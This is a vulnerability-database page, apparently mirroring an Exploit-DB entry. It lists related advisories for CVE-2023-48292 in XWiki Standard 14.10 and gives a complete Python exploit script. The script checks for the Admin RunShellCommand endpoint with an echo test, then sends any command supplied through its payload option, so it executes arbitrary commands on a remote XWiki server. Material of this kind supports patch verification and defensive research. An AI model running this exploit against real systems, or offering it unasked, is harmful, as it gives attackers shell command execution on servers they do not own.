Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

XWiki Standard 14.10 - Remote Code Execution (RCE)

🗓️ 29 Mar 2025 00:00:00Reported by Mehran SeifaliniaType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 281 Views

CVE-2023-48292 allows remote code execution on XWiki Standard 14.10; tested on Ubuntu 20.04 LTS.

Related
Code
ReporterTitlePublishedViews
Family
BDU FSTEC		The vulnerability of the XWiki Admin Tools administrative tool of the XWiki Platform, a platform for creating collaborative web applications. This vulnerability allows a perpetrator to execute arbitrary commands.
14 Feb 202400:00
bdu_fstec
Circl		CVE-2023-48292
23 Mar 202522:13
circl
CNNVD		Admin Tools Application Cross-Site Request Forgery Vulnerability
20 Nov 202300:00
cnnvd
CVE		CVE-2023-48292
20 Nov 202318:02
cve
Cvelist		CVE-2023-48292 XWiki Admin Tools Application Run Shell Command allows CSRF RCE attacks
20 Nov 202318:02
cvelist
EUVD		EUVD-2023-2925
3 Oct 202520:07
euvd
Github Security Blog		Run Shell Command allows Cross-Site Request Forgery
20 Nov 202321:01
github
NVD		CVE-2023-48292
20 Nov 202318:15
nvd
OSV		CVE-2023-48292 XWiki Admin Tools Application Run Shell Command allows CSRF RCE attacks
20 Nov 202318:02
osv
OSV		GHSA-8JPR-FF92-HPF9 Run Shell Command allows Cross-Site Request Forgery
20 Nov 202321:01
osv
Rows per page
# Exploit Title: CVE-2023-48292 Remote Code Execution Exploit
# Google Dork: N/A
# Date: 23 March 2025
# Exploit Author: Mehran Seifalinia
# Vendor Homepage: https://www.xwiki.org/
# Software Link: https://www.xwiki.org/xwiki/bin/view/Download/
# Version: XWiki Standard 14.10
# Tested on: Ubuntu 20.04 LTS with OpenJDK 11
# CVE : CVE-2023-48292

from argparse import ArgumentParser
import sys
import logging
from requests import get, post, RequestException
import validators

# Constants
CVE_NAME = "CVE-2023-48292"
HEADERS = {
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
}

# Configure logging
def setup_logging(logfile):
    logger = logging.getLogger()
    logger.setLevel(logging.INFO)

    # Create a logging handler for console output
    console_handler = logging.StreamHandler(sys.stdout)
    console_handler.setFormatter(logging.Formatter('%(asctime)s - %(levelname)s - %(message)s'))
    logger.addHandler(console_handler)

    # Create a logging handler for file output
    file_handler = logging.FileHandler(logfile)
    file_handler.setFormatter(logging.Formatter('%(asctime)s - %(levelname)s - %(message)s'))
    logger.addHandler(file_handler)

def validate_url(url):
    """
    Validate the URL to ensure it has the correct format and starts with 'http://' or 'https://'.
    """
    if not validators.url(url):
        logging.error("Invalid target URL format. It must start with 'http://' or 'https://'.")
        sys.exit(1)
    return url.rstrip("/")

def check_vulnerability(target_url, method):
    """
    Check if the target URL is vulnerable to the CVE-2023-48292 vulnerability.
    We send a test payload and inspect the response to determine if the vulnerability exists.
    """
    try:
        # Test payload to check for vulnerability
        test_payload = "echo 'testtesttest1234'"  # Payload to execute a test command on the target system
        vulnerable_url = f"{target_url}/xwiki/bin/view/Admin/RunShellCommand?command={test_payload}"

        if method == "GET":
            response = get(vulnerable_url, headers=HEADERS)
        else:  # method == "POST"
            response = post(vulnerable_url, headers=HEADERS)

        if response.status_code == 200 and "testtesttest1234" in response.text:
            logging.info("Target is vulnerable! Command execution test succeeded.")
            return True
        else:
            logging.info("Target does not appear to be vulnerable.")
            return False
    except RequestException as error:
        logging.error(f"HTTP Request Error: {error}")
        sys.exit(1)

def perform_attack(target_url, payload, method):
    """
    Perform the attack by sending a custom payload to the vulnerable server.
    """
    try:
        logging.info(f"Attempting attack with payload: {payload}")
        vulnerable_url = f"{target_url}/xwiki/bin/view/Admin/RunShellCommand?command={payload}"

        if method == "GET":
            response = get(vulnerable_url, headers=HEADERS)
        else:  # method == "POST"
            response = post(vulnerable_url, headers=HEADERS)

        if response.status_code == 200:
            logging.info(f"Attack successful! Response: {response.text[:100]}...")  # Display a snippet of the response
        else:
            logging.warning("Attack attempt failed.")
    except RequestException as error:
        logging.error(f"HTTP Request Error: {error}")
        sys.exit(1)

def main():
    """
    Main function to parse command-line arguments, check for vulnerability, and optionally perform the attack.
    """
    parser = ArgumentParser(description=f"{CVE_NAME} Exploit Script")
    parser.add_argument("target", help="Target URL (e.g., https://vulnsite.com)")
    parser.add_argument("--exploit", action="store_true", help="Perform attack with a payload")
    parser.add_argument("--payload", default="echo 'testtesttest1234'", help="Custom payload for exploitation")
    parser.add_argument("--method", choices=["GET", "POST"], default="GET", help="HTTP method to use (GET or POST)")
    parser.add_argument("--logfile", default="exploit.log", help="Log file to store results")
    args = parser.parse_args()

    # Set up logging to file and console
    setup_logging(args.logfile)

    # Validate the target URL
    target_url = validate_url(args.target)

    logging.info("Checking the target for vulnerability...")
    if check_vulnerability(target_url, args.method):
        if args.exploit:
            # Perform the attack with the provided payload
            perform_attack(target_url, args.payload, args.method)
        else:
            logging.info("Run with '--exploit' to attempt the attack.")
    else:
        logging.warning("The target is not vulnerable. Exiting.")

if __name__ == "__main__":
    main()

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
29 Mar 2025 00:00Current
9.4High risk
Vulners AI Score9.4
CVSS 3.18.8 - 9.6
EPSS0.22938
cve numberremote code executionxwiki standardubuntu 20.04exploit detectionlogging setup
281